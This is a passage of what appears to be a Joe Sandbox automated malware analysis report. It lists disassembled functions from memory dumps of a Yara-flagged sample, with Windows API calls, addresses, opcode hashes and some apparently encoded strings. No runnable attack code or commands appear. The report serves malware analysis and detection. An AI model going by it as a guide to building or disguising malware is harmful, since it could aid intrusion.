                                            • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                          • GetLastError.KERNEL32 ref: 00417508
                                          • __dosmaperr.LIBCMT ref: 0041750F
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00417549
                                          • __dosmaperr.LIBCMT ref: 00417550
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1913693674-0
                                          • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                          • Instruction ID: 408a06d1cf8366b2ae1f3811782f7cd1de2d149ac6df674c503089c6b33b154d
                                          • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                          • Instruction Fuzzy Hash: 2B21CD716042057FDB20AF66C880CAB7779EF44368710852AF91997751D739ED818768
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                          • Instruction ID: a152f36e3a909e8a5dd4e8ae9001fa42b519cc60122ecbc9fd24270ab44e6d07
                                          • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                          • Instruction Fuzzy Hash: C9218771A00105AFEB11AF6DDC80B6BF7ADEF442687018595FD1A97260E734FC419B50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                          • Instruction ID: c7293b4e2709a45a538168f771ca0d14dcb5837bd486a4ca313c9b6cb4d0090e
                                          • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                          • Instruction Fuzzy Hash: DF21C971600219AFDB20AF659C40DEB776DAF44368B10456BFA29E7261D738DC8187A8
                                          APIs
                                          • FreeLibrary.KERNEL32(00000000,?,04B536AF,04B437FE,?,00000000,04B42A70,04B42A72,?,04B53828,00000022,00420B0C,00422950,00422958,04B42A70), ref: 04B53661
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                          • Instruction ID: 522ad273bd1effe3784af4b01f248eff5a0322d26bd1200c530598a789cbb94a
                                          • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                          • Instruction Fuzzy Hash: 1221D571B05211ABC731AF25EC80B5ABBA9DB427E0F1511B4ED05A73A1DB30FD06C694
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 04B586B4
                                            • Part of subcall function 04B551BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B55422,?,00000000,-00000008), ref: 04B55220
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04B586EC
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04B5870C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 158306478-0
                                          • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                          • Instruction ID: 73245b248b1357d587670e7f9fa5d989bd9cb0d02745ef5bbff5a8aa21559e4d
                                          • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                          • Instruction Fuzzy Hash: B211C4B66011197E77223B725CCCEBFADADCE491E870014B4FD05D1130FA60EE1181B5
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 0041844D
                                            • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00418485
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184A5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 158306478-0
                                          • Opcode ID: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                          • Instruction ID: 9202fe00a5822ec58f1db5debff3a6e736622b39abe9cc99b2a2d556b75614f5
                                          • Opcode Fuzzy Hash: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                          • Instruction Fuzzy Hash: A01104B65005167F6B212BB25D89CEF295CDF89398721402EF905A1201FE2CDE8241BE
                                          APIs
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04D0ADA0
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04D0ADB9
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: Value___vcrt_
                                          • String ID:
                                          • API String ID: 1426506684-0
                                          • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                          • Instruction ID: f7843e2fb899912db9a9cc4b2dd996d079f34fc9236902377943b3a1eb3cbf7c
                                          • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                          • Instruction Fuzzy Hash: B301B53230D3119EE73427B86CC4B5F2B54FB11279360823AE510572E1FE95A84255E8
                                          APIs
                                          • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B5CAC6,00000000,00000001,?,00000000,?,04B59CE5,00000000,00000000,00000000), ref: 04B5CE66
                                          • GetLastError.KERNEL32(?,04B5CAC6,00000000,00000001,?,00000000,?,04B59CE5,00000000,00000000,00000000,00000000,00000000,?,04B5A288,?), ref: 04B5CE72
                                            • Part of subcall function 04B5CE38: CloseHandle.KERNEL32(0042CA30,04B5CE82,?,04B5CAC6,00000000,00000001,?,00000000,?,04B59CE5,00000000,00000000,00000000,00000000,00000000), ref: 04B5CE48
                                          • ___initconout.LIBCMT ref: 04B5CE82
                                            • Part of subcall function 04B5CDFA: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,04B5CE29,04B5CAB3,00000000,?,04B59CE5,00000000,00000000,00000000,00000000), ref: 04B5CE0D
                                          • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,04B5CAC6,00000000,00000001,?,00000000,?,04B59CE5,00000000,00000000,00000000,00000000), ref: 04B5CE97
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                          • Instruction ID: 5d0ad675687bf1188602e3c826c61c689413839fce39a0b736d80fccde857984
                                          • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                          • Instruction Fuzzy Hash: D1F0AC3A540259BBCF225F95DC04A9D7F36FF486A1B454460FE1996130D732A821ABD4
                                          APIs
                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                          • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                            • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                          • ___initconout.LIBCMT ref: 1000CD55
                                            • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                          • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                          • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                          • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                          APIs
                                          • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000), ref: 0041CBFF
                                          • GetLastError.KERNEL32(?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000,?,0041A021,?), ref: 0041CC0B
                                            • Part of subcall function 0041CBD1: CloseHandle.KERNEL32(FFFFFFFE,0041CC1B,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000), ref: 0041CBE1
                                          • ___initconout.LIBCMT ref: 0041CC1B
                                            • Part of subcall function 0041CB93: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CBC2,0041C84C,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CBA6
                                          • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CC30
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                          • Instruction ID: b2f8e5e77f4d676ad0e685e0439cc39e0844638a97b8ad054d7e4805cd8d945f
                                          • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                          • Instruction Fuzzy Hash: D6F01C36580118BBCF221F95ED45ADA3F26FF497A0B404031FA0D96121D6328C619BD8
                                          APIs
                                          • SleepConditionVariableCS.KERNELBASE(?,00409CAA,00000064), ref: 00409D30
                                          • LeaveCriticalSection.KERNEL32(0042D064,00401044,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D3A
                                          • WaitForSingleObjectEx.KERNEL32(00401044,00000000,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D4B
                                          • EnterCriticalSection.KERNEL32(0042D064,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                          • String ID:
                                          • API String ID: 3269011525-0
                                          • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                          • Instruction ID: ed1c7c09b24d5124ebc712e1e7f2573f2e40a4f9289d25860d0ee5ca28a3c269
                                          • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                          • Instruction Fuzzy Hash: 8FE0ED31A85628FBCB111B50FC09AD97F24AF09759F508032F90976171C7795D039BDD
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00410F6D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                          • Instruction ID: 1dd945e64f0d07477a36e3934c2b0d008af5dc79b4df0e8c4bba017ec81d751d
                                          • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                          • Instruction Fuzzy Hash: 65512B75A0820296CB217714DA023EB6BA49B40750F618D6FF095463E9EBBCCCD7DA4E
                                          APIs
                                          • Concurrency::cancel_current_task.LIBCPMT ref: 004096CE
                                          • std::_Xinvalid_argument.LIBCPMT ref: 004096E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                                          • String ID: vector too long
                                          • API String ID: 3646673767-2873823879
                                          • Opcode ID: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                          • Instruction ID: f4da2a5e80598445161bac14147e50f437b92e93805fe79093e1120e4695fd56
                                          • Opcode Fuzzy Hash: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                          • Instruction Fuzzy Hash: 5A5125B2E002159BCB14DF69C84066EB7A5EF80314F10067FE805FB382EB75AD408BD5
                                          APIs
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 04B4BA66
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 04B4BB1A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 3480331319-1018135373
                                          • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                          • Instruction ID: 9abc96a7417e2df934baa2b10761900e938abc9b3e39e12c11abe961b5f58a61
                                          • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                          • Instruction Fuzzy Hash: A141B530A04218ABDF10DF68C884A9EBBB5FF84318F14C1D5EA145B392DB75FA16DB91
                                          APIs
                                          • RtlEncodePointer.NTDLL(00000000), ref: 04B4C2EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 2118026453-2084237596
                                          • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                          • Instruction ID: c9a5f74cace97e68370c34ee3b892004a0484ee40074c5990f4d4150ab101f9a
                                          • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                          • Instruction Fuzzy Hash: 18413971901209EFDF25DF98CD80AEEBBB5FF88704F158499F904A7261D335A950EB50
                                          APIs
                                          • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: EncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 2118026453-2084237596
                                          • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                          • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                          • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                          • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                          APIs
                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C085
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: EncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 2118026453-2084237596
                                          • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                          • Instruction ID: fbbd96fe11317218043276dd35bf9a0f08be73a273ccdb2477d392fe495d2932
                                          • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                          • Instruction Fuzzy Hash: EC414972900209EFCF15DF94CD81AAEBBB5BF48304F14826AF9057B2A2D3399951DF58
                                          APIs
                                            • Part of subcall function 04B49EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EF7
                                            • Part of subcall function 04B49EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49F34
                                          • __Init_thread_footer.LIBCMT ref: 04B415F3
                                            • Part of subcall function 04B49EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EAC
                                            • Part of subcall function 04B49EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49EDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                          • String ID: KN$]DFE
                                          • API String ID: 4132704954-873640922
                                          • Opcode ID: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                          • Instruction ID: ff3efab5941bf662027bfd6ea38497bf6cd16a727b41f2926751eb31215a868a
                                          • Opcode Fuzzy Hash: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                          • Instruction Fuzzy Hash: EF215AF0F00284CAE720DF78F8457A9B770EF59308F8482A5E4541B261DB7466C6DB0D
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 04D0078C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID: KN$]DFE
                                          • API String ID: 1385522511-873640922
                                          • Opcode ID: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                          • Instruction ID: 4293d956b2bdec09bda07c90788e28a8d8ae93ca3f322661f7380e5c78bad685
                                          • Opcode Fuzzy Hash: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                          • Instruction Fuzzy Hash: E82128B0F00244DAE720EF64E8557A9B760EF59308F44C269E4541B2A1EB7461C2CF5D
                                          APIs
                                            • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                            • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                          • __Init_thread_footer.LIBCMT ref: 0040138C
                                            • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                            • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                            • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                          • String ID: KN$]DFE
                                          • API String ID: 2296764815-873640922
                                          • Opcode ID: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                          • Instruction ID: c7a597aca517c447b6d362385d7579deaaf1cbe7f5b4030a5a3b5ced69f100f5
                                          • Opcode Fuzzy Hash: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                          • Instruction Fuzzy Hash: 57210CB0F00384CAE724DF64E8467B9B760AF19308F44827AF8546B2B2D77855C2CB5D
                                          APIs
                                            • Part of subcall function 04B49EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EF7
                                            • Part of subcall function 04B49EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49F34
                                          • __Init_thread_footer.LIBCMT ref: 04B486E5
                                            • Part of subcall function 04B49EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EAC
                                            • Part of subcall function 04B49EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49EDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                          • String ID: CD^O$_DC[
                                          • API String ID: 4132704954-3597986494
                                          • Opcode ID: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                          • Instruction ID: 59b5ed072ac1290d62531ff0e33a0c725a41206fa6fa83a2b2a61b0788764e82
                                          • Opcode Fuzzy Hash: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                          • Instruction Fuzzy Hash: 81014970F44318EBC720FF7CAD41A6E7360EB58210F9005A9D11057350DB74B585D789
                                          APIs
                                            • Part of subcall function 04B49EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EF7
                                            • Part of subcall function 04B49EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49F34
                                          • __Init_thread_footer.LIBCMT ref: 04B48125
                                            • Part of subcall function 04B49EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EAC
                                            • Part of subcall function 04B49EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49EDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                          • String ID: CD^O$_DC[
                                          • API String ID: 4132704954-3597986494
                                          • Opcode ID: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                          • Instruction ID: af046db6b11d0d4f87bf558f95e42612ec187e818f902667d21e36d5443e65c7
                                          • Opcode Fuzzy Hash: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                          • Instruction Fuzzy Hash: 750149B1F40208DFCB20FF78FC41A6E7360EB49200FA001A9E4195B390D73465859747
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 04D0787E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID: CD^O$_DC[
                                          • API String ID: 1385522511-3597986494
                                          • Opcode ID: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                          • Instruction ID: 29616861664ccf82fd99b5c3f471ce708fba2fd4307b1426c64272f2ceb2adaf
                                          • Opcode Fuzzy Hash: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                          • Instruction Fuzzy Hash: B201F970F043549BC720EFB8AD51BAD7360EB18315F9082B9D1155B2D1EBB4B541CB99
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 04D072BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID: CD^O$_DC[
                                          • API String ID: 1385522511-3597986494
                                          • Opcode ID: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                          • Instruction ID: 67b41bf4fea855232aecff75476d19b09ff746544a2bb70f0378110791ebaebc
                                          • Opcode Fuzzy Hash: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
